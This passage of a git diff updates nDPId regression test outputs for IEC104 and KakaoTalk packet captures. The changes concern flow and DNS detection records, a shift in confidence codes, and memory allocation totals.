+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1317629088495,"flow_last_seen":1317629090498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":50,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1317629088520,"flow_last_seen":1317629088739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","packets-captured":15,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":609,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1317629090498} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets 
captured/processed: 15/15 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870938 bytes -~~ total memory freed........: 5870938 bytes -~~ total allocations/frees...: 118133/118133 +~~ total memory allocated....: 6004572 bytes +~~ total memory freed........: 6004572 bytes +~~ total allocations/frees...: 120895/120895 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 691 chars diff --git a/test/results/KakaoTalk_chat.pcap.out b/test/results/KakaoTalk_chat.pcap.out index b587d4564..b84544d10 100644 --- a/test/results/KakaoTalk_chat.pcap.out +++ b/test/results/KakaoTalk_chat.pcap.out 
@@ -2,64 +2,64 @@ 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1430069021959} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069021959,"flow_last_seen":1430069021959,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1430069021959,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1430069021959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069021959,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwAAEAAQBHSIAoYUrwKvAEBljAANQAogKaG7QEAAAEAAAAAAAAEYXV0aAVrYWthbwNjb20AAAEAAQ=="} 
-00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069021959,"flow_last_seen":1430069021959,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1430069021959,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"auth.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069021959,"flow_last_seen":1430069021959,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1430069021959,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"auth.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022006,"flow_last_seen":1430069022006,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069022006,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1430069022006,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":79,"pkt_l4_len":43,"thread_ts_msec":1430069022006,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAD8AAEAAQBHSHQoYUrwKvAEBixMANQArGNJpegEAAAEAAAAAAAAHYWMtdGFsawVrYWthbwNjb20AAAEAAQ=="} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022006,"flow_last_seen":1430069022006,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069022006,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"ac-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022006,"flow_last_seen":1430069022006,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069022006,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"ac-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022007,"flow_last_seen":1430069022007,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1430069022007,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1430069022007,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":78,"pkt_l4_len":42,"thread_ts_msec":1430069022007,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAD4AAEAAQBHSHgoYUrwKvAEB4dgANQAqGG9RAgEAAAEAAAAAAAAGa2F0YWxrBWtha2FvA2NvbQAAAQAB"} 
-00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022007,"flow_last_seen":1430069022007,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1430069022007,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"katalk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022007,"flow_last_seen":1430069022007,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1430069022007,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"katalk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1430069022041,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":136,"pkt_l4_len":100,"thread_ts_msec":1430069022041,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAHgb0gAANREBEwq8AQEKGFK8ADWLEwBk4PlpeoGAAAEAAwAAAAAHYWMtdGFsawVrYWthbwNjb20AAAEAAcAMAAUAAQAABZUADQdhYy10YWxrAmdswBTALwABAAEAAACbAARuTI1wwC8AAQABAAAAmwAEAckAJw=="} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022006,"flow_last_seen":1430069022041,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069022041,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"ac-talk.kakao.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.112"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022006,"flow_last_seen":1430069022041,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069022041,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"ac-talk.kakao.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.112"}} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1430069022041,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":114,"pkt_l4_len":78,"thread_ts_msec":1430069022041,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGIb0wAANREBKAq8AQEKGFK8ADWWMABOrZ2G7YGAAAEAAgAAAAAEYXV0aAVrYWthbwNjb20AAAEAAcAMAAUAAQAABccACgRhdXRoAmdswBHALAABAAEAAABWAATSZ\/AP"} -00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069021959,"flow_last_seen":1430069022041,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069022041,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"auth.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}} 
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069021959,"flow_last_seen":1430069022041,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069022041,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"auth.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}} 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1430069022042,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":166,"pkt_l4_len":130,"thread_ts_msec":1430069022042,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAJbtdwAANREvTwq8AQEKGFK8ADXh2ACCeK5RAoGAAAEABQAAAAAGa2F0YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAD9AAMBmthdGFsawJnbMATwC4AAQABAAAAegAEbkyOIsAuAAEAAQAAAHoABAHJAD3ALgABAAEAAAB6AAQByQA\/wC4AAQABAAAAegAEbkyNJQ=="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022007,"flow_last_seen":1430069022042,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069022042,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"katalk.kakao.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.142.34"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022007,"flow_last_seen":1430069022042,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069022042,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"katalk.kakao.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.142.34"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022058,"flow_last_seen":1430069022058,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1430069022058,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1430069022058,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":84,"pkt_l4_len":48,"thread_ts_msec":1430069022058,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEQAAEAAQBHSGAoYUrwKvAEBo7UANQAwrR37RAEAAAEAAAAAAAAHYm9va2luZwRsb2NvBWtha2FvA2NvbQAAAQAB"} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022058,"flow_last_seen":1430069022058,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1430069022058,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"booking.loco.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022058,"flow_last_seen":1430069022058,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1430069022058,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": 
{"query":"booking.loco.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022059,"flow_last_seen":1430069022059,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022059,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1430069022059,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1430069022059,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEBMmwANQAtbIX3UQEAAAEAAAAAAAAEdXAtbQR0YWxrBWtha2FvA2NvbQAAAQAB"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022059,"flow_last_seen":1430069022059,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022059,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": 
{"query":"up-m.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022059,"flow_last_seen":1430069022059,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022059,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-m.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022059,"flow_last_seen":1430069022059,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1430069022059,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1430069022059,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069022059,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwAAEAAQBHSIAoYUrwKvAEB5boANQAoZpVNewEAAAEAAAAAAAAEaXRlbQVrYWthbwNjb20AAAEAAQ=="} 
-00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022059,"flow_last_seen":1430069022059,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1430069022059,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"item.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022059,"flow_last_seen":1430069022059,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1430069022059,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"item.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
